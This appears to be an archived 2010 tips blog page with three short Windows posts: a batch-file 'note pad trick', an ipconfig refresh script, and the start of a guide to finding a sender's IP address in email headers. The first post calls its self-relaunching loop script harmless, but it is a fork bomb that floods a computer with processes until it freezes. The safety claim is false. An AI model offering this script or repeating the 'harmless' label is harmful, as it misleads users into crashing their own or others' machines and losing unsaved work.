Archive for 12/08/10

Funny note pad trick

This is a real funny note pad trick. It is harmless.....
open note pad and type

:s
start 0%
goto :s


and save it with
.bat extension.....

Posted in by » ραη¢нαηαη∂ «. No Comments

Know ur IP Configuration

Copy the code given below in notepad :-

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew

and save it as “technoskillonline.bat

Posted in , by » ραη¢нαηαη∂ «. No Comments

Finding IP address in Hotmail, yahoo and Gmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail



Read More....
Posted in by » ραη¢нαηαη∂ «. No Comments